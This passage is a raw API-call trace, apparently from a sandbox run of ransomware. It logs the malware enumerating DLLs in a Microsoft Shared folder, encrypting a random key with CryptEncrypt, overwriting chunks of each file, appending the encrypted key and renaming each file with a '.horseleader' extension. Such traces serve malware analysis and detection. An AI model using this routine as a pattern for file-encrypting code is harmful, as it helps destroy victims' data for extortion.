lpFileSize=0x32aedd0*=217984) returned 1 [0245.540] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.541] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.545] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.546] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.546] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x181c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.546] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 
[0245.546] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.547] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.547] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x30380, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.547] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.549] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.549] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.549] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.549] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.549] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.549] CloseHandle (hObject=0x158) returned 1 [0245.550] GetProcessHeap () returned 0x780000 [0245.550] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 
0x7e2960 [0245.550] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL.horseleader") returned 84 [0245.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fperson.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fperson.dll.horseleader")) returned 1 [0245.551] GetProcessHeap () returned 0x780000 [0245.551] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.551] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66f78700, ftCreationTime.dwHighDateTime=0x1cb7000, ftLastAccessTime.dwLowDateTime=0xc251c2e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x66f78700, ftLastWriteTime.dwHighDateTime=0x1cb7000, nFileSizeHigh=0x0, nFileSizeLow=0x2c380, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FPLACE.DLL", cAlternateFileName="")) returned 1 [0245.551] lstrcmpiW (lpString1="FPLACE.DLL", lpString2="Windows") returned -1 [0245.551] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL") returned 71 [0245.551] StrStrIW (lpFirst="FPLACE.DLL", lpSrch=".horseleader") returned 0x0 [0245.551] lstrcmpW (lpString1="FPLACE.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.551] lstrcmpW (lpString1="FPLACE.DLL", lpString2="_uninstalling_.png") returned 1 [0245.551] lstrlenW (lpString=".testttjffg") returned 11 [0245.551] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart 
Tag\\FPLACE.DLL", lpSrch=".testttjffg") returned 0x0 [0245.551] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.552] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.552] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fplace.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.552] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL") returned 71 [0245.552] StrStrW (lpFirst="FPLACE.DLL", lpSrch=".txt") returned 0x0 [0245.553] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=181120) returned 1 [0245.553] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.553] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.555] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.555] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.557] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x139c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.557] 
ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.557] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.557] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.557] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x27380, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.558] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.559] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.559] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.559] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.560] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.560] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.560] CloseHandle (hObject=0x158) returned 1 [0245.560] GetProcessHeap () returned 0x780000 [0245.560] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.560] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL.horseleader") returned 83 [0245.560] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fplace.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fplace.dll.horseleader")) returned 1 [0245.561] GetProcessHeap () returned 0x780000 [0245.561] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.561] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79275700, ftCreationTime.dwHighDateTime=0x1caac21, ftLastAccessTime.dwLowDateTime=0xeedd0ad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x79275700, ftLastWriteTime.dwHighDateTime=0x1caac21, nFileSizeHigh=0x0, nFileSizeLow=0x26d80, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FSTOCK.DLL", cAlternateFileName="")) returned 1 [0245.561] lstrcmpiW (lpString1="FSTOCK.DLL", lpString2="Windows") returned -1 [0245.561] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL") returned 71 [0245.561] StrStrIW (lpFirst="FSTOCK.DLL", lpSrch=".horseleader") returned 0x0 [0245.561] lstrcmpW (lpString1="FSTOCK.DLL", lpString2="#Decrypt#.txt") returned 1 
[0245.561] lstrcmpW (lpString1="FSTOCK.DLL", lpString2="_uninstalling_.png") returned 1 [0245.561] lstrlenW (lpString=".testttjffg") returned 11 [0245.561] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL", lpSrch=".testttjffg") returned 0x0 [0245.561] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.561] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.562] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fstock.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.562] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL") returned 71 [0245.562] StrStrW (lpFirst="FSTOCK.DLL", lpSrch=".txt") returned 0x0 [0245.562] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=159104) returned 1 [0245.562] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.562] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.565] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.565] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.565] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x10ec0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.565] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.567] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.567] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.568] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x21d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.568] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.569] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.569] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.570] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.570] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, 
lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.570] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.570] CloseHandle (hObject=0x158) returned 1 [0245.570] GetProcessHeap () returned 0x780000 [0245.570] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.570] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL.horseleader") returned 83 [0245.570] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fstock.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fstock.dll.horseleader")) returned 1 [0245.572] GetProcessHeap () returned 0x780000 [0245.572] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.572] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6a43200, ftCreationTime.dwHighDateTime=0x1cb700e, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xf6a43200, ftLastWriteTime.dwHighDateTime=0x1cb700e, nFileSizeHigh=0x0, nFileSizeLow=0x39580, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="IETAG.DLL", cAlternateFileName="")) returned 1 [0245.572] lstrcmpiW (lpString1="IETAG.DLL", lpString2="Windows") returned -1 [0245.572] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL") returned 70 [0245.572] StrStrIW (lpFirst="IETAG.DLL", lpSrch=".horseleader") returned 0x0 [0245.572] lstrcmpW (lpString1="IETAG.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.572] lstrcmpW (lpString1="IETAG.DLL", lpString2="_uninstalling_.png") returned 1 [0245.572] lstrlenW (lpString=".testttjffg") returned 11 [0245.572] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL", lpSrch=".testttjffg") returned 0x0 [0245.572] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.572] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.572] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\ietag.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.575] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL") returned 70 [0245.575] StrStrW (lpFirst="IETAG.DLL", lpSrch=".txt") returned 0x0 [0245.575] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=234880) returned 1 [0245.575] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.575] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.578] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.579] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.579] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1a2c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.579] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.580] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.580] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.580] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x34580, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.580] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.585] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.585] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.585] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0245.585] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.586] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.586] CloseHandle (hObject=0x158) returned 1 [0245.586] GetProcessHeap () returned 0x780000 [0245.586] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.586] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL.horseleader") returned 82 [0245.586] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\ietag.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\ietag.dll.horseleader")) returned 1 [0245.587] GetProcessHeap () returned 0x780000 [0245.587] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.587] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b89b100, ftCreationTime.dwHighDateTime=0x1caac21, ftLastAccessTime.dwLowDateTime=0x5392d770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7b89b100, ftLastWriteTime.dwHighDateTime=0x1caac21, nFileSizeHigh=0x0, nFileSizeLow=0x18b80, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="IMCONTACT.DLL", cAlternateFileName="IMCONT~1.DLL")) 
returned 1 [0245.587] lstrcmpiW (lpString1="IMCONTACT.DLL", lpString2="Windows") returned -1 [0245.588] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL") returned 74 [0245.588] StrStrIW (lpFirst="IMCONTACT.DLL", lpSrch=".horseleader") returned 0x0 [0245.588] lstrcmpW (lpString1="IMCONTACT.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.588] lstrcmpW (lpString1="IMCONTACT.DLL", lpString2="_uninstalling_.png") returned 1 [0245.588] lstrlenW (lpString=".testttjffg") returned 11 [0245.588] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL", lpSrch=".testttjffg") returned 0x0 [0245.588] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.588] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.588] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\imcontact.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.590] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL") returned 74 [0245.590] StrStrW (lpFirst="IMCONTACT.DLL", lpSrch=".txt") returned 0x0 [0245.590] 